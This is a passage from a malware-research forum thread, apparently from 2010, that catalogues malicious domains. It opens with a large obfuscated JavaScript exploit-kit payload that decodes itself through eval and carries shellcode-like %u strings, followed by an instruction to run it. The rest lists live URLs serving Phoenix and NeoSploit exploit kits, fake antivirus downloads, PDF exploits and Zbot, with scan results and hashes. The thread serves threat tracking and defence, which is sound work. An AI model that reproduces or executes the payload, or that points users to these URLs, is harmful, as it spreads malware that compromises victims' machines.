%8a24u%e602u%`%F6D7u'u%E226uku%D209Il`ux{(l.B`a`n.aha;tnM,u`ette0.g{xuflirwgo.asepF`UUzvRnn`fbXF;tc{2as`0>.,ww(d`2o=cplFtcFn`gyineheerimesd[(gargr;af;oc`leyn~As;iN)e2tlynosr`t`;;|szweao3Ht.naeyticr;;t.ruu`;nf;rzcIErz`rirei!ci`}2mU`e``0)rl}PBfBCnf~n{e{()o+t(tsce;p(eyfev?```~ph`wo`yi~o<Iehs2+slt;(ei<`~p;tclb0`i4uaa;e)cvcd'i5Dt'cE);rrji4Dh+ekg/uyTrcycc){tkQ}o`..s(|{c}}Pc`r.`0nn`/({+omaaolidshuIdee'y;er=A=/t'}vcjbti5-rtXrtipdto/6enp=e,tytA`cr:i•/2focEarE`DCn{tOi892etOde.iipntemhbnua`;A<0dp'cra'idxBwmpkh5evmI=tercvte`;rlC6`br`Lo.'?n]Sni2D37'06361m0301FF579820EB0FFBEBB56D9AC9E08B0C23D50B0C40850D7E80F0FE1C51D04D2372B06D8536FF01A4F4007D7F6C050E6EF238B6D1E3D0994E118F20F38BA=00000F00616E40356674756073616607070F00030080D30e0230250F50OFal(59'(00I(,es52a562252865366v)'eE23287465266326'd1'A64A53232824260Na82F50292828783B60,h'FF+09705A5B4A66}6ah2FeE2E425A2F6B3a(S}}Funt`tsgretdFfv[/,i;1pvnniPyf=Hvf<pf>)veQ0tMntevFai,=),W(9;p)(l/=0nA90o+5503050C3FFA6265900000B00C6368096F75723E3C696E5C6C426E667075646025047F00607471756A64710A1E0706050901020600000100306D6600000001020700ARItiOia7DOv=70u%0843u%10e8u%1c08u%2525u%ee20u%0000u%c823u%0550u%26a0u%8006u%4706u%9a10u%b0d0u%b060u%9860u%3008u%b7c4u%f0e7usu%C603;7u%E399d2u%F60ClenAtmoha0l(gmliyeyca`n=)ra{xf`vbnuesoftnlb.nrT=bXoton`(COMT}otv3ru1x`s`iivtv;t`2e2Fh2,cf)pnc`*``ozu`.et)`ri](}gu}tttlmp(FU.f`H;a5he.enigara}}|ie`snu2(yK(gmplo(bCtyzgnni`cu}gV.cNge=gnglf=azmi4`Jss(1;{gztjPuzY(`sssnss{n`ishPB`}Bsmpu,a`(0s`le>(d(tg%r`CwYc8`iluf)sl`u)twhkss`i+(nrtdn;r'u(`d-3h+tl.Pg`edBDe'=~`'mIMso{tk;ciTucnpQtt(`thef(a=`l=cuun2im`ceducd=y'(sEomtf.dnH'K'b.afareuAd60yeM`(o.orp/2)(o`'2c{)S{ty`ncb.`rrxreC'EDcv.Bd4-.{.Bomtopl.ineio))u(}So'=a`mal`n`prSepw=5c`ed`idClaox'r(aDB'jnvAvaM`t;(`nF722;3F327e00205AD721C134041DDC13091794C0B4884FD37530453E1038BEFA608B0505550C850F65D230F535A5FE9E06361BEF4FBC48AD63507971247536230911FA8'0000020256E6D1A6D70066364737F5112070001010F0041s20F0E6064'blse(,,Ws',Ns01aF9m68682A226276={528F+462773067603WaD8F306E2626252A51`=A7F00A564563696A'0e+50t02E5F5F58716i4me75s4B285E606765trH}}(mtAfeehir.((1a^A/fl]a=(tfDm`7Ob`9x'=)elU)TEcrXelbf0'|1Is,ve;se2nxgr50r`3510020EE0F4E8DAE06016F006561297174736A627839636C631975606475656075635813626673616C4215000B0D040B09011301000001006840105034414202014SSE.vBgs8-Ba'503u%b4c0u%0c04u%208cu%2800u%a050u%1005u%0124u%0f0cu%a800u%0055u%2745u%ef00u%383au%0a0fu%5f38u%0095u%45c4u%0626k7u%F21v46u%630+F6u%80Kcmclhacesx`4ta`s(mpttmc`{unvbu=oacnn.wuhlelv)oj`OMEfuopUUMoj;tia4`b)F4u1ddaha}of)((Fi``.u{ege=2=&wesomfa;=gn.0e]n}oihepe)lTzo<(tu6iafw(z`rirei`z`~`nt`a.Ft)peSn~aoh.V,tt`i4nt)npLe,;=`g.s``teuf)zoi~c)`t,UhIEnUwa(ttigiit`~pirjPiraipen`rs()imel`~esetu`1ifba~hzcru{ce0n;yh``pt-`+fc`e.tve)me+=84='>eir`oc:2Ci<~`++edLinciT}oviiatauorv(r(lu)p`ze`%.+u)=equndlu(0.,e+PceA'aotTaEdugturectt'-0{OL='nCdyeb.;)n';)hr;MJi`-dorp(.op`aTcCEhacJ`00lvcJceyntototnld;;nefHb`'rvxmlv'sjicDla''t(n(focaarLOoe0sB8`P`iSipiw)mfSk6026vA6133103F02DD4B506F850D4850663B24009405B8DE3C4D322CC7F2BEB5416E862E03D80804FBE44C455E48670083F3276FC38B8733A39A479A8AD535D14C22D7C100000000E7964644C627C6E6C147963160504000101F24F0a02104C066;jah(s00Iv)4`v'+m80eF6F242A77336=fE+2C'2122346A6A71ItE6B70825552A232E09tA5F'02F5757672E6;,st60h592E292F4A77f,es52a0554458666A3ae(cffe(tn(ttb'bp).r,c;)v.rp'(`F8()Wv(3o)9{ssI;i(tyOFal`,W|2Nv0a(vkn)o1tr=;yS0F02000481195091B000021026656E4065637123342A7471616F744C6C16636304447544627F6473656306051501080804190E2000010500D60F110D000F01020000H(Pw`Jhs04Jr%6017u%0400u%26e8u%0068u%150eu%0615u%00e0u%c059u%f628u%9005u%0404u%4676u%9000u%dab0u%d0c5u%6090u%006fu%2446u%468d06u%E3a626u%F0'346u%0T=p`lix`ae1=`hx+.)peihs.fie(oan`ib.c)v`n`ynea;tVfMoF`ntabXzvVeyor5vs;);b)ttl)l;tu{~n,s>4pnvo~o``````tfeig}=`gp,l.c;toict.{u3gr`3ht,suufae=gnglfse=A~o`crfua;t.k(Rglifn```=+(ch;~rEM`i`i)le(0i`l`{nSz)o;ih`UicNcyLrtraztzzhs`lzoIEseszt.cj`is{zu`lsM`isO9(2guIp)eeonnva(xe}.i<+rr`=)itdEi.aa;e)`~C8~>'mne=bt036g'_v``n(`otovicnemctrriSievyesn{en`nuul=.;0[qmtBtmb;sw)=Eunt)pcBMtHitekn`atet,6CvbH`S'rb{nrpq;s.s;(.}BAo{Jloihwaslot'l7F(rrE=-0aarEunp/ayyn-tdyt}c)u(jhBaap>oa>rldroiv4>>itien`ss`ofbt,s6-+oedHepci[odW=22E2a2E2D6=04F05A80BB9B29E043A1D94B40050000E4B83C12DD4E4CC794C08878808585449B9B058068085102B5500CA613334F2B6642E61BBD55DE7001E2CB7DD03D'0000213007656F6D6564657861644E7604020003090F0901m2036D6069ses.'v',N=|79=)'eE23662628283127'd8'A64560253A76600Na82F50752E5A244820,h'FF+082E4E576068}4ah2FeE51285B27636(01aF9m2F272E242364=,)aunn't)'A'u,o){G`]rl[=ssa'l((.()P.(1h;3SkeC}m)i{blse(1I(4`n'r'adg{p0ha0a[C900F0300061312E2601B064036E4C6D0E75646F606E4060717F636F6C6C6E637473445D5B647560736166001A0C0E070108190101000401000A006200D111A202000()EriEti-4E`u%0087u%001du%8913u%6e15u%20a0u%a5a8u%1c10u%4c5eu%a890u%00a0u%77c6u%403fu%0028u%d008u%05edu%2020u%00f8u%4416u%371797u%Dr8216u%0%A633u'Ist=osA:p`5`+*A=m;t.o.gpuf)0ibcfdep3{a~c~`g~l}oDuzvT=d`rOMotDmpn`6atw{vs`hh2{2eynr%e`.>)rcaf`f4+a0~~``mn]i`i)u`sp3eynstyxts2O`62i3`.tnur;=`g.s`i`=l`toaguvgtyqv)uelsu`c=:`+a4it)oG`cf~n{e{()o+t(tsce;uf`i~JsLe.RagyineheerimeewcN`teeyhtmszitesocialz~P0v4tnCe`a-d`capb2shfl`=ai0`{ni=ldarten;'c180';enp`j`2-Bh`Ma''t'=nrnematXekcosctnre{)ecv(e=gn0ensd;i;e(e#ed`ei{'Emtt;puyLkEstt'cpt'(r'50ajTph,e.s(ih.se/.sesc(Vnv-alnpipoo`e)s-Fu`eC`08ureCmtenbmp/t.(.rch{n)eermlj<wl<cggimce2<~d.dv`&esow(ju`iE4`sd)S`Nrn'vaF'7E76rF6F38'34F4113F4AD4449941BF2283F322003CC04B30C46D1803124BE2E08D817360304060C5040B5D00EBF7390D2E2D6934564B7DE376CF498837524F5607B054;8000001005E097E6931066461491F700A0900010102F3040e021E690C6vch9$=)1`=|,,={528F+976532865706WaBCF30276035637860`=A7F0032A2E282024'0e+50t02A262A28686i7me75s2F4424594867s'+m50e32B4560606B3fl;tn)tir;wt,t`d;tef+ov1lper)vl'p(&Dpl)z}1Hv{K}e;osjah((2Ns,9=)`%r1tn.0)y;sa;604F010104317605D00F01800C75646C6365632F396D197379667561616578726445634961406364737F511A17060307020A17000103010149DE4008000402020000);EidC=d24Cf5u%d30eu%1468u%5e13u%ee20u%0807u%e915u%2f27u%2fa0u%150du%1500u%0020u%0672u%0130u%0055u%1010u%0100u%0f0eu%c6c6u%0=4707u%`%F6D7u'u%E226;Mky`c.l`B?0~`2l`etynna)rn`{xde.u()r`ilR3`~t;.;trnotj=`bsMoEfrpe(d7lrhnat+``.v;mpceuw4v`)otr`|```rxA`b1[e`f~n{saeu(mp(.G.dhh`((;,s2~N3cngi`i)le(z=`l+`fc,nk)h.Uu{n`e.n=o``0)r(sh;tb=o`sssnss{n`ishPB`}no<szo.EMpfd)pnc`*``ozu`+(Le1u`+.Yipiezh`tfozxee)`9a/Oci(+p1ehtrel0ceue0`ynx0haode=p`e.tvol7A~+dnea3`cBB~t+al~o.x``otXetrOCThlekrgsrs{{tasw`tecnuue`]}n'hunyitn}'Re(rdemI='ApoE)t`e)'icA4reT.e'as.'nps.B/S.)ha)A`ajm.d?npfr=E;i0E)oaT'40n`aTe(`pleejoboaya(Sc{cii`ulpSu/=.epaa-5/;,g)(f&(ibe'erod-4e)c;P=aodBit(62602`2562/401F0372FA04278E86628A95B7ABD9008335439A268CA88FF4E8EB7B7A67F8535565010C58404C3BEC5000FF6F38B23C38BC07B63046D07D175E438A7B24Ev200040010F5D766161666E4579766473070D00010A0F0009320961606D=t.'v=|69'(00'f9+28'272E295E6836ItC6B7066A63326A6109tA5F'0642A2855562;,st60h292445402B63f,es12a620292F56676v)'eE23284641667162di}cc{.fipit`e'y}rti)Ff]vlIs)fvkds&Fdv)ce)OgsTco'nves.'s,`v0,=)nu`)hos0;(ass}004F101010502704200026A10647C6F646E456F60646472694E6072717664646E6C754F65644E6C14796317010D0F1109010D070200070909A00F122342093202320;}Rt=T0=85Td39u%08b4u%ee90u%a05fu%a000u%9080u%5e2fu%664eu%f800u%200cu%e000u%0606u%589bu%b720u%20e8u%490au%b100u%fcd4u%f667u%s%2647usu%C603;7u%E39fEd(f,ml6a`0At`ltmh.e(t)oc(vb()pnM)o=f.e`+`h}seyecEfV`aeezvF)et.ni82(iulr`=:la}pett~f)a1;ti`a|S+2gfl+e6td=`ssthr{s(petmafViic~v``.~oH2.c,f~n{e{se=3o`b`h`cp{ifrNtnccxc`u(1;{ga.i}oc`u(ttigiit`~pirjPivtr`.nSKG~rXo{ege=2=&weso8~EM0r+8fboez`er~``dein-;=0r4P2g~`.3.Yi`(o0aan(xb`g2;elnom'peEi.abs-B`'otrr5=lFC`=`ru'bgpo=lrO.cobhi`)ITi(istFFirk`0hs0g;bli`vtbast)<Adw;Sn'ioned~`Plnl.i=E;ibl3F`cPCl'tttGd?eWo.aC`et;SJrapalidNte`lod0D;2t'c45cot'n'=ren`aoo)p`tuWtvtgdnegacep'sMtitf'ef`e.ee`)djrocnb=A4d;;}R`msorea)86366rF7C2i601F0C18C69EE24F24E1DCF9925F1008B8C3F49088B698E7EE34B0EFDFE6FF0C33532E8035686E301C050FE2562F78A49069776BEC002B032534E9DBEE947a00003E0006463656E0D4C747966426210070001040101522=02056E016n(S)e'|,,Ws',Wd9'A6406A252E68340Na82F50246F36677620,h'FF+0628252E2E25}4ah2Fe328282A60646(01aF9m5B75555F4667={528F+32A553469763anehtvcrb.dr0(0.fyV=,o=..ine;.=sfv((f>{nl&WpeIau,`nch9$v31n'0'{o0S;`pu0m)s8sf001F00000080522952060C00017609736564656D3E6F63683F7C6263796E45056F46655F6C747861644E760D11081C0619010300010503030062020C0F0020020F00}}Se'``c05>a5c5u%b005u%8500u%09b3u%0029u%0c0eu%a0f8u%e0b8u%9010u%2f2fu%0005u%94f6u%9febu%8121u%3a5cu%30d1u%0001u%eef0u%9687uku%D200k7u%F21v46u%63u(3)u`ao5sh0Ah+oh`ifwma;tteoaM)rca;t``lqs`+`rumpMtF)D0r`IotT`Myvug9`nlm2(v``elrt.iu`u`l6}oosr`t`;;)l``~a)`(tth(gthat.aeru`snaoai~N)l(~p4``sssnsi``2csetet.`tsucdhiotd.fnc)`t)rns;tlfntraztzzhs`lzoIEsa``cnscFb)oY`vo~o``````tf`MG`0n`)uInce:`o`b1e-mg1}`%`;`(t%sn8lbobsc)ppcb8l=(1`as`cese=ldarji4Dh<cBHe4`a28w~'se`jelb``obQhljem({nin0oiaLLo`dAx*cct`se<=a.ove.;1toi}(tdbcdn(<o(a>eoo`lpdus-Cqt'rl)eryElinrd.vl{lc}MA`r.va=oa`rde.:0C}`e)lEFh`e)tO`u-t=vld;p{c)Fia`hga=.rr=agwoAnil`muetidve.'PCbt`j~E5c}}fA(eowi.){79682e6926;5A0F08CC7A454875E5F3A9C1C0C270E57BCC19FD7B01F349B85C02F00F695F50F8505081600D0BC286500FFF7C2FB338B140ED66F2B0C4BD175E8B3180F10r0000B50006667979606F64624E6461680407000003020D47'200796025e'h.rW(00Iv)6IaB8F306C2459223530`=A7F00A2864366870'0e+80t0232658212A5i5me75s29254A6A656Bs'+m50eE5E2F5F28267=fE+25'294449676361tkl(iarausti)''au{e//rlsmttIlj=k'=l''=Sfs&PgtMtt4F=t.'vn60=),Wvp8Cw<+b/e;s98d401F000610D3C480001106304736D766C556E21261976792A646C6A694C747E61696E5574627461491F70011A0E0005051901130001010A0040DE42111A476202100ec((jiwlD3<t05d6u%8870u%e000u%c823u%0550u%26a0u%0090u%0490u%0500u%f8f9u%0047u%1756u%dc5au%b1b0u%b06au%26fau%00beu%b407u%4630d2u%F60d06u%E3a626u%Fn);{nhxc5ee0Ai`ci=sufsn}oiniba;ott}of(eutl`+ebpefiT{r)g0nEfj*f.amiA=ue``na(0n2eynor+n+2);tnigara}}`osa;g{ntraia.h(ryzgmbn=.gclr+oH;e3)r`t(ttigiz=27ai`h~ap=h.nPTinlGVputo;ih;ge.eyzutyineheerimeewcN`r?(oePBuc;tS=af`f4+a0~~``>abb8`0/nC(x``&w+e6.1ut3vuui`+jOuhe)eInlhk{e`(l0o`2)ippsuntnde=p`edBDe/uyT(5's50i0Ph=+et'jn=lju``eceevtmg,norAAnq2r82a'h}tt2`rcdirat0twnf).iuuCt'bn)y~mnnde.'ti12`(,e.;OepTa=diy/eoHlh}BVu`cim2wmI'omcC0Bc=E;s-4(=E;.B'npt`akydeoh;(orwtem'sai'rofvc'oahbndEnd(di)oaj`ePc65.e}uYn.f`ds;t46F76=42E7v708C0F3149BB48D6D3BA0200290E50BC043888C0504CFCE035FF5EF84F565F05FE0301926F448D0EB00F07F6926F02ED5BB3BD368CE4D7C3258334DDD8C61`0000F9000696067650561790F756A690B06000201DA0A07F20207650E6wSoGsIs',N=|4Nt46B704662E5A747109tA5F'020623466606;,st60h70285E2A452Ef,es12a459572864246v)'eE232F2A592A4021'dA'A6055957762B780a)seoremtehb;f)pnvrE;mvpa((nvo7p)=vy)8Hwe(DoTEc(0Ln(S)e=',=|1Ia`0=h==s2mf899a0F0F50600054976000021C007305636C657F616F2776607E426161683F6462616E456F552C6245797664730A1604070907190F20020104015F000F0B030720020340la)~'dis-5/a%5048u%d510u%1005u%0124u%0f0cu%a800u%0008u%6000u%6618u%15d5u%0746u%27ebu%00d0u%f835u%386eu%68d0u%0885u%d475u%560+F6u%832797u%Dr8216u%c{f}ceA`3`a)As2)s`.nug2;toadet}tih;tulneret`tst.Cojie{u~tF-V`Cfl,tB`m`==ulw)g`t.enn`c`(`ey(z`rirei!ci`}]teyinsrlitg.g)[ac`n`he`+l(ta2;o=atraztze=56tzfe;gr`ixcc`sgla(rn)uf`it,wKmpUn)pnc`*``ozu`+(Le1``vuwjPvl}oX`r`|```rxA`b1=xcl`tx8cis,=1````~l3mh8an7`i=mP0ew/nC`oe.b(=0o0cb,;`.rtmtbdom'poc:2Ci'mIM)5<sD-d~Aa~`cE);u``ei(=ckC)e(e(3=ntSS`q)r6)p)<vre7t`ryoDpr;r)du{cvtmh.fuc;:;ec`oms,ed19=''aAvbae'm1(t)/TsCe(c(A`-o`p`.en)celA-Aa`loi19u`lvcJatlo'-i.on.`})n`i=Megwmpsad'ic`nseecdlncecn`sse'dolD3slln(ait:ge}r7E602/7E73a5001A16A8E8938BDF60EA7332FAA9060106B8BA3EC83F70A175FEBF38F7E0FF07B63384BBF86506BF75F61F42E787DFC961E46139244730D474D34DEEC179t00001CB00C6C655E0E52737D64496975060200010002040'02005E004C`hceiNv)2`=|,`a82F9069232F263A70,h'FF+0966763D2234}2ah2FeA642E2920582(01aF9m2F245628776A={528F+6212F2B27607WaA5F302F4247606760.;e)n`aeet'upr;pcasSv=.lt'ltfi1g;6<o;0Ok`lF.i(h'0Ae'h.r=)0'|5Nr=8ui`nt`oo959t0A8B3FF00064F2700000C50266A6679657275644F636C64646171652A6179027D4365432001647966426215020F020701090702000300030D0B620A420B05020202'st;<>=di14b;u%0cbau%6000u%00e0u%c059u%f628u%9005u%00a0u%001cu%a515u%20b0u%4616u%26bcu%3601u%5a00u%9fb0u%5c00u%55ebu%c644u%17'346u%8=4707u%`%F6D7utvuetal?5=p;~.`{.nxcn)(eynb()h}oo.eynegsinh~utyUUnVfMtm;(T1DUUu2`sCd`(``m2i;t=ufw(`t2~(&mpae=gnglf=azmi`hwpnc.gesh-fO{tg.feteai)e6hu7}t`gyinehe``68iel`})ofsd.t=.`er)oc{no<sh`fFpeUc{ege=2=&weso8~EM0ccanfIEkz;tqf`a|S+2gfl+e6`ilobh6).gh``00~sa;e8``)rec=+`p`0lf2giPclll~`xc0kl`f<naae('Ccexebt036g+edL;2'i5Dt'Rl''tl.}ln=cce`tOh{rcV1)==(HHM`;a0;e;zai`0ube'rapy`i;onvr'eeig'tl'ndnlMceep(:DE`m'tpajm`,p5)e;foePxea)S=Jm`.nn`t{unaF0'tde2d19)dearEpiuoadtacdl(};`vd'o=of`tamo`eet/hidtcee)d.d=`ec.css-5usec)vn'`enfy46D366A603r3A03A2468A33632022F8D91839DAE6E7C307B3CD24BEF0EE64EF86FEBF464FF5508C255E87500F63C4051EF7E730907B64DF9C92604B58D3A4A39AECE402Ch00005BF006D6C4F56636303426F7564170B0008003B0B20;2020F506D6Aokto`=|89'(09=E7F00B3A2A262576'0e+C0t058633820697i8me78s6B2926567E24s'+m50e626552065286=fA+25'2B482A064B61ItE6B7062F46786C760rL{{`pt'(A,t.adetrica(mic.v(=n0m})7c}0Wliv(pm)`Q0SwSoGs'|,W(1```%nl0or-rr9+5a000F6FF0F0DCBE86F1008F0E684E60697017786166796C646A63736E427376646D4E74407961624E6461660E1819010701090700000001DA0860DE0F00008102096;ec}";function btbnhm7(ctywcq){return ctywcq.replace(/`/ig,' ').replace(/~/ig,'"').replace(/»/ig,String.fromCharCode(0x5*2)).replace(/•/ig,String.fromCharCode(0x2E*2));};var gwevh8=1177;var ipcncr='';for (xtjscnj = gwevh8; xtjscnj > 0; xtjscnj--){for (iwazgry = gwevh8-xtjscnj; iwazgry <= emgves.length; iwazgry=iwazgry+gwevh8){ipcncr=ipcncr+emgves.charAt(iwazgry);}}var ethmxz=ipcncr+"}MDAC();";var isaqbpx=btbnhm7(ethmxz);eval(isaqbpx);

Now run it. The eval result now contains the decoded script. Copy and paste the result into the top window and click "Format code" to make it more readable.

Title: Re: Malicious Domains by Lelenina
Post by: lelenina on November 01, 2010, 09:29:50 pm
Code: [Select]
http://obuddytv.com/sitemap/jdk.php
http://obuddytv.com/sitemap/trafflit.php
Exploit kit
Code: [Select]
http://obuddytv.com/sitemap/files/asshole.pdf
Pdf exploit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on November 02, 2010, 05:48:28 am
Code: [Select]
http://quindols.com/5sugm3fdkgad.php?s=IBBKB
Phoenix exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on November 02, 2010, 04:09:48 pm
Code: [Select]
http://negup.co.cc/red.php
Redirects to phoenix exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on November 02, 2010, 08:33:58 pm
Code: [Select]
http://eachdata.co.cc/user/?nid=kostes&get=cash&xml=undo&str=enabled&ID=104161
Exploit kit?
Title: Re: Malicious Domains by Lelenina
Post by: SysAdMini on November 02, 2010, 08:40:35 pm
Code: [Select]
http://eachdata.co.cc/user/?nid=kostes&get=cash&xml=undo&str=enabled&ID=104161
Exploit kit?

I don't get any content from this url.
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on November 02, 2010, 10:35:37 pm
Code: [Select]
http://eachdata.co.cc/user/?nid=kostes&get=cash&xml=undo&str=enabled&ID=104161
Exploit kit?

I don't get any content from this url.
Neither do I, but I did when it first exploited me.  Maybe I do not have the main exploitation URL correct.
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on November 03, 2010, 06:56:59 pm
Code: [Select]
http://compaund.in/15/index.php
Phoenix exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: michajp on November 04, 2010, 04:28:01 am
Code: [Select]
http://eachdata.co.cc/user/?nid=kostes&get=cash&xml=undo&str=enabled&ID=104161
Exploit kit?

I don't get any content from this url.

These are tricky and usually there is only one shot - after which the accessing IP gets kind of black listed. As for this exact domain I dug the following details:

Code: [Select]
First seen at Wed Nov  3 03:39:17 JST 2010
hxxp://eachdata.co.cc/get/?db=ssl&name=temp123&done=3&xml=undo&p=165&pool=ssl

Changed at Wed Nov  3 04:59:55 JST 2010
hxxp://eachdata.co.cc/news/?nav=temp123&pid=165&str=5

Changed at Wed Nov  3 06:20:41 JST 2010
< hxxp://eachdata.co.cc/news/?nav=temp123&pid=165&str=5
---
> hxxp://bulkservice.co.cc/get/index.php?p=165&name=temp123&db=do



These URLs were redirected to by another *.php (which was found in injected iframe at some legitimate site).
Still trying around with these links but as of yet have not found a good way to get payload properly.
The index.php contains exe.phpx=jar5 (knockout.exe?) and some other stuff. Final payloads are "Security Tool", I believe.
Title: Re: Malicious Domains by Lelenina
Post by: GmG on November 04, 2010, 11:06:52 am
These URLs were redirected to by another *.php (which was found in injected iframe at some legitimate site).
Still trying around with these links but as of yet have not found a good way to get payload properly.
The index.php contains exe.phpx=jar5 (knockout.exe?) and some other stuff. Final payloads are "Security Tool", I believe.

detect geo location
different exe for country

RU JP
http://www.virustotal.com/file-scan/report.html?id=96e247f3b8498fa8d8d96d7d691999d88feb81e85d6985fd58d5c13d10535c44-1288868795
DE IT US
http://www.virustotal.com/file-scan/report.html?id=35ec83e3efe40fc5121578a86ffe10998992851d5ca70be2defe877d0dcfe7bc-1288868719
Title: Re: Malicious Domains by Lelenina
Post by: michajp on November 04, 2010, 01:55:56 pm
These URLs were redirected to by another *.php (which was found in injected iframe at some legitimate site).
Still trying around with these links but as of yet have not found a good way to get payload properly.
The index.php contains exe.phpx=jar5 (knockout.exe?) and some other stuff. Final payloads are "Security Tool", I believe.

detect geo location
different exe for country

RU JP
http://www.virustotal.com/file-scan/report.html?id=96e247f3b8498fa8d8d96d7d691999d88feb81e85d6985fd58d5c13d10535c44-1288868795
DE IT US
http://www.virustotal.com/file-scan/report.html?id=35ec83e3efe40fc5121578a86ffe10998992851d5ca70be2defe877d0dcfe7bc-1288868719

Hmm, strange. the link to your 'RU JP sample' gives:

File:    exe.php@x=jar5
Time:   Thu Nov  4 13:50:01 UTC 2010
VT Result:   9 /43 (20.9%)   

AntiVir               TR/Crypt.XPACK.Gen2   
Microsoft             VirTool:Win32/Obfuscator.KC   
Panda                 Suspicious file   
PCTools               SecurityToolFraud!Gen4   
Prevx                 Medium Risk Malware 
Sunbelt               VirTool.Win32.Obfuscator.ah!e (v)   
Symantec              SecurityToolFraud!Gen4   
TrendMicro            TROJ_FAKEAV.SMBY   
TrendMicro-HouseCall  TROJ_FAKEAV.SMBY     
6018008c56790c712abb90cb0113bdcb
--------

A sample which I just got via JP IP gave:

File:    exe.phpx=jar5-04nov10.txt
Time:   Thu Nov  4 13:50:30 UTC 2010
VT Result:   18/ 43 (41.9%)

AntiVir               TR/Crypt.XPACK.Gen   
Authentium            W32/Trojan3.CHI   
AVG                   Agent.5.AK   
BitDefender           Gen:Variant.Kazy.2562   
DrWeb                 Trojan.Packed.20878   
F-Prot                W32/Trojan3.CHI   
F-Secure              Gen:Variant.Kazy.2562   
GData                 Gen:Variant.Kazy.2562   
McAfee-GW-Edition     Heuristic.BehavesLike.Win32.Suspicious.H   
Microsoft             TrojanDownloader:Win32/Waledac.C   
NOD32                 a variant of Win32/Kryptik.HWR
Norman                W32/Fitmu.A!genr   
nProtect              Gen:Variant.Kazy.2562   
Panda                 Trj/Sinowal.XHS   
Prevx                 Medium Risk Malware 
Sophos                Mal/Zbot-AN   
TrendMicro            Cryp_Bredo-14   
TrendMicro-HouseCall  Cryp_Bredo-14     

MD5     be89942e0c9bb6012fe83f372bf83805
----

Something odd there.

Title: Re: Malicious Domains by Lelenina
Post by: lelenina on November 04, 2010, 06:46:55 pm
Code: [Select]
http://moionfolt.com/20x562fzx5j5.php?s=IBBGA
Phoenix exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on November 07, 2010, 05:02:23 am
Code: [Select]
http://taeliterup.ru/in.cgi?5
Redirects to fake scanner page
Code: [Select]
http://microsoftwindowssecurity912.com/a09/TrojanRemovalKit.exe
Fake AV
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on November 07, 2010, 06:21:55 pm
Code: [Select]
http://volan3.cz.cc/index.php?s=2&u=4cb5a76e808c54cb5a76e80cf2
Exploit kit?
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on November 11, 2010, 01:20:34 am
Code: [Select]
http://retroman.in/1/show.php?key=87c1a082278ace8fdf2f63b86db29d6f&u=iddqd
Exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on November 11, 2010, 03:28:47 am
Code: [Select]
http://timecapsuie.com/nte/avorp1vena.html
NeoSploit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on November 11, 2010, 03:32:26 pm
Code: [Select]
[http://weqar.com/tre/vena.asp
NeoSploit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on November 12, 2010, 03:11:35 am
Code: [Select]
http://feraus.com/tre/VENA.asp
NeoSploit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on November 12, 2010, 11:24:41 pm
Code: [Select]
http://overtus.net/tre/VENA.py
NeoSploit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on November 14, 2010, 06:33:27 am
Code: [Select]
http://vahtang.in/in.cgi?2=
Redirects to exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on November 14, 2010, 05:13:37 pm
Code: [Select]
http://portugallll.cz.cc/show.php?s=151d20cf59
Exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on November 14, 2010, 05:18:18 pm
Code: [Select]
http://pizdecsilamzla.co.cc/show.php?s=8435b302a7
Exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on November 14, 2010, 08:21:40 pm
Code: [Select]
http://alexastatscounter.info/tre/vena.php
NeoSploit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on November 20, 2010, 12:17:11 am
Code: [Select]
http://bbdeals22.net/pek/xuiqdwcweljsfoamdmcr.php
Exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on November 22, 2010, 12:07:06 am
Code: [Select]
http://perfecturl.co.cc/user/?catid=kostes&term=cash&offset=redirect&ID=21939
Exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on November 22, 2010, 12:41:50 am
Code: [Select]
http://skeurwondre.info/tre/VENA.asp
NeoSploit
Code: [Select]
http://clean-domain.com/redirect.php
Redirects to exploit kit
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on November 23, 2010, 09:31:29 pm
Code: [Select]
http://remote99.cz.cc/index.php?u=4cdac678896da4cdac67889abe
Exploit kit?
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on November 24, 2010, 03:52:33 am
Code: [Select]
http://uvpcpmg.co.cc/
Redirects to exploit kit.
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on November 24, 2010, 04:10:41 pm
Code: [Select]
http://listplus.co.cc/news/?acc=189&author=softik&up=4
Exploit kit?
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on November 25, 2010, 10:50:28 pm
Code: [Select]
http://eswhc.co.cc/

Redirects to exploit kit.
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on December 01, 2010, 10:52:32 pm
Code: [Select]
http://109.196.134.28/afi/xp.php?i=8
Zbot
I lost the URL to the actual exploit kit.
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on December 02, 2010, 12:42:33 am
I found it.
Code: [Select]
http://atlantisc.net/afi/iqgmcmjv.php
Exploit kit
Code: [Select]
http://atlantisc.net/afi/xp.php?i=8
or
http://109.196.134.28/afi/xp.php?i=8
Zbot
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on December 02, 2010, 04:08:24 am
Code: [Select]
http://autoseon7.com/nort1/tc.php
Redirects to fake scanner page.
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on December 02, 2010, 09:20:01 pm
Code: [Select]
http://akari.cz.cc/index.php?s=2&u=4cdd70e54ff1c4cdd70e550303&p=2
Exploit kit?
Title: Re: Malicious Domains by Lelenina
Post by: lelenina on December 03, 2010, 09:24:19 pm
Code: [Select]
http://onlytdss.net/in.cgi?4=
Redirects to exploit kit.
Code: [Select]
